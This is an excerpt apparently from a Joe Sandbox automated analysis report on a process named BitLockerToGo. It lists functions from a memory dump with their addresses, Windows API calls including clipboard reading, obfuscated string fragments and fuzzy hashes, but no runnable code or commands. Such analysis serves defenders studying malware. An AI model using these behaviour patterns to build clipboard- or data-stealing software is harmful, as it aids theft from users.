                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeSecurity
                                                                                • String ID:
                                                                                • API String ID: 640775948-0
                                                                                • Opcode ID: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                • Instruction ID: ca338ed000cba09c134a9ecbf479b52692d88648cc8417c010cf118771328cdf
                                                                                • Opcode Fuzzy Hash: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                • Instruction Fuzzy Hash: 7DE05E39BD47406BFA385B08DC13F4422129386F21F388224B310EE7D9C8A8B501420C
                                                                                Function 0043E6A5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 0043E6A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ForegroundWindow
                                                                                • String ID:
                                                                                • API String ID: 2020703349-0
                                                                                • Opcode ID: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                • Instruction ID: eb5cd64e0cd090f695d5de900f82e4eebcc02a3ea27d0b2ee91ac1c0039229b8
                                                                                • Opcode Fuzzy Hash: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                • Instruction Fuzzy Hash: 2BC012EC9084808BC248EB12EC4252A3B5EAA8A209B049038D80B02B23E9306805968A
                                                                                Function 0043BCB0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000,0043D8F6,?,?,?,00000000,0040B40D,00000000,00000000), ref: 0043BCCE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                • Instruction ID: 6c6d5fcf156c4dc9181b7fd85535f9ef3000d663acf77e4cc9904710c0b9b036
                                                                                • Opcode Fuzzy Hash: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                • Instruction Fuzzy Hash: AED01231405122EBC7241F18FD06B873B64DF0A321F030472B8006B071C664EC519AD8
                                                                                Function 0043BC90 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00408797,2D2C008A), ref: 0043BCA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                • Instruction ID: 28c2b2b5d3f1f64fcd0aca9316f6b1f640d95bbb8965ee836e226e74b875d2a4
                                                                                • Opcode Fuzzy Hash: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                • Instruction Fuzzy Hash: DBC09B31445121ABC6142B15FD05FC67F64DF45355F114066B40467073C770AC41D6D8

                                                                                Non-executed Functions

                                                                                Function 004111E9 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 499COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ($?$f$u$}
                                                                                • API String ID: 0-3561895482
                                                                                • Opcode ID: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                • Instruction ID: 86e3bcde5e116734b7454ff0522683787c5f8ed0e2df54b8e8f55331097e388c
                                                                                • Opcode Fuzzy Hash: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                • Instruction Fuzzy Hash: B212A371A0D7808BD324DF39C4813AFBBE1ABD5314F198A2FE5D997391D63889418B47
                                                                                Function 004237D0 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 431COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004238A8
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 0042394C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: 52$QVTH$]VWC$lnmh$n`fn
                                                                                • API String ID: 237503144-3964871452
                                                                                • Opcode ID: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                • Instruction ID: 3b8b4807c8318ae77837d9a5b010143032c821d60a60d601bdcb57454f2de873
                                                                                • Opcode Fuzzy Hash: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                • Instruction Fuzzy Hash: 2FE1457160C3518FD720CF68D8917ABBBE1EB85314F444A3EF99587381D3B89906CB9A
                                                                                Function 00438040 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %$&$9$<$R$T$W$b
                                                                                • API String ID: 0-3780034300
                                                                                • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                • Instruction ID: 26f6469176a43b47c6e288f4693b2497bb05b8a0a051c4656522d96c8d770806
                                                                                • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                • Instruction Fuzzy Hash: 10719F2250C7C28AD3128A7C484425BEFD25BE7234F2D9FADF4E5873D2C56AC50A9367
                                                                                Function 00432D70 Relevance: 9.2, APIs: 6, Instructions: 179clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                • String ID:
                                                                                • API String ID: 1494355150-0
                                                                                • Opcode ID: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                • Instruction ID: 693f7ef225a156252cf7c29a72516dce540735802ffb423964d4f98d76e8ff95
                                                                                • Opcode Fuzzy Hash: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                • Instruction Fuzzy Hash: 5A510572A187614EC310DF7C894521FBAE15BC9224F098B3EE8E4973D1C678890A87D7
                                                                                Function 00428F6C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428DFB
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428F3C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: rM$zM
                                                                                • API String ID: 237503144-2784921869
                                                                                • Opcode ID: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                • Instruction ID: 97ddf7a0595f55843d8ed3a5592f022fec3ca497b996ab7f20284500c0a95c28
                                                                                • Opcode Fuzzy Hash: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                • Instruction Fuzzy Hash: D661D0F0A443219FE754CF69C991A9ABFB0FB46350F1A42ADE4459F392C3748842CBD5
                                                                                Function 004321FB Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 105COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                • API String ID: 2610073882-2392625418
                                                                                • Opcode ID: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
                                                                                • Instruction ID: b79967f44f2bd9de6c2e39eb15a986492cae5a4b6d791275bc0e3f4af17e2b78
                                                                                • Opcode Fuzzy Hash: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
                                                                                • Instruction Fuzzy Hash: A4414A71208B818BD725CF3CC884646BFA2AB56224F18869CD8E54F3EAD3B9D415C762
                                                                                Function 00431FCB Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                • API String ID: 2610073882-2392625418
                                                                                • Opcode ID: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
                                                                                • Instruction ID: d4354520380d8857094eb198d18f80dccd27335c0442324ae3d10dc815d509f5
                                                                                • Opcode Fuzzy Hash: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
                                                                                • Instruction Fuzzy Hash: 7F413B70208B818FD725CF3CC894316BFE2AB56224F08869CE8E58F3D6C679D515C766
                                                                                Function 0042D00D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID: !$0
                                                                                • API String ID: 3664257935-301933775
                                                                                • Opcode ID: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
                                                                                • Instruction ID: 363f3f82d949639bcd6d0eea56e432ff8ce25dbbcf70693a7459fa4f30c8f00e
                                                                                • Opcode Fuzzy Hash: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
                                                                                • Instruction Fuzzy Hash: 77816C31A083908AD728CF29944177FFFE2AFD6304F28466ED4D59B391C67C8945C75A
                                                                                Function 0042E15E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: FreeString
                                                                                • String ID: 0$0NuNup=Nu
                                                                                • API String ID: 3341692771-489510435
                                                                                • Opcode ID: 7f8beb90b6d3d21fac22d6ddf1416ed98184bf1b6b8d184863318b01022fefc2
                                                                                • Instruction ID: a4bf0d74fff444342dca5fd751c387fe43c0cdea25e2a7e78e7437dd74f2d7f8
                                                                                • Opcode Fuzzy Hash: 7f8beb90b6d3d21fac22d6ddf1416ed98184bf1b6b8d184863318b01022fefc2
                                                                                • Instruction Fuzzy Hash: 0671B121508FD28EC332CB3C9948506BFE15A67134B584F9DE2F24BBF6D360A106C766
                                                                                Function 0042DF52 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: FreeString
                                                                                • String ID: 0$0NuNup=Nu
                                                                                • API String ID: 3341692771-489510435
                                                                                • Opcode ID: 395abd82820c58e9f5b0748602e23c35014779e179459456d8521168e36a6ec3
                                                                                • Instruction ID: 58d32ed88d263c95b123063246a65912e29459f3d0a4f5e1dcf1ae7d9471fc9d
                                                                                • Opcode Fuzzy Hash: 395abd82820c58e9f5b0748602e23c35014779e179459456d8521168e36a6ec3
                                                                                • Instruction Fuzzy Hash: 2171AF21508FD28EC332CB3D9988506BFE15A67134B484F9DE2F24BBF6D760A102C766